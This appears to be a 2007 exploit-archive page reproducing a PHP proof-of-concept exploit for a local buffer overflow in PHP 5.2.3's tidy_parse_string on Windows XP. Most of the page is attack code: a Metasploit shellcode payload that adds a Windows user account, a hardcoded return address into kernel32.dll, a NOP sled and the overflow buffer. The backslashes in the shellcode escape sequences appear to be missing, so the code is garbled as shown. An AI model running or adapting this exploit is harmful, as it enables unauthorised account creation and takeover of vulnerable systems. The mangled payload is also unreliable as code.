PHP 5.2.3 Tidy extension Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP 5.2.3 Tidy extension Local Buffer Overflow Exploit
# Published : 2007-06-19
# Author : rgod
# Previous Title : Linux Kernel < 2.6.20.2 IPV6_Getsockopt_Sticky Memory Leak PoC
# Next Title : DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit

<?php
//PHP 5.2.3 tidy_parse_string() & tidy_repair_string() local
//buffer overflow poc (win)
//rgod
//site: retrogod.altervista.org

//quickly tested on xp sp2, worked both from the cli and on apache
//let's have a look here: http://www.google.com/codesearch?hl=it&q=+tidy_parse_string&sa=N

if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");}

# win32_adduser -  PASS=tzu EXITFUNC=thread USER=sun Size=233 Encoder=JmpCallAdditive http://metasploit.com
$scode =
"xfcxbbx0bxadx7dx9axebx0cx5ex56x31x1exadx01xc3x85".
"xc0x75xf7xc3xe8xefxffxffxffxf7x45x39x9ax07x96x49".
"xdfx3bx1dx31xe5x3bx20x25x6exf4x3ax32x2ex2ax3axaf".
"x98xa1x08xa4x1ax5bx41x7ax85x0fx26xbaxc2x48xe6xf1".
"x26x57x2axeexcdx6cxfexd5x29xe7x1bx9ex6dx23xe5x4a".
"xf7xa0xe9xc7x73xe9xedxd6x68x9ex12x52x6fx4bxa3x38".
"x54x8fx77xf1x54xebxfcxb2x64x76xc2x4bx89xf3x83xa7".
"x1ax73x18x15x97x1bx28x8exa1x50xa8xe0xb2x66xa9x8b".
"xdbx5axf6xbaxedxc2x5ex34xe9x81x9fx3dx5axedxf0x0c".
"xbax8dx66x09xc5xc7x79x7exc5x30xe6xedx5dx90x8cx95".
"xf8xccx61x05x23x62x1bxbdx03x0fx90x58x36xcfx25xd6".
"xd8x2fxbex62x50x0fx11xd2xdex0bx4dxf2xf8xb3xe3x9f".
"x70x93x97x30x1axb2x0bxa8xaex5bxa1x46x6fxe2x2dxca".
"x06x8axc4x67xadx20x76xfcx22xb6x0bxdcxcfx43x82x3c".
"x1fxeax1ex79x5fxecx9ex81x5f";

$EIP="x8Bx51x81x7C"; //0x7C81518B      call esp kernel32.dll
$NOP=str_repeat("x90",12);
$____buff=str_repeat("a",2036).$EIP.$NOP.$scode;
tidy_parse_string(1,$____buff,1);
?>

# www.Syue.com [2007-06-19]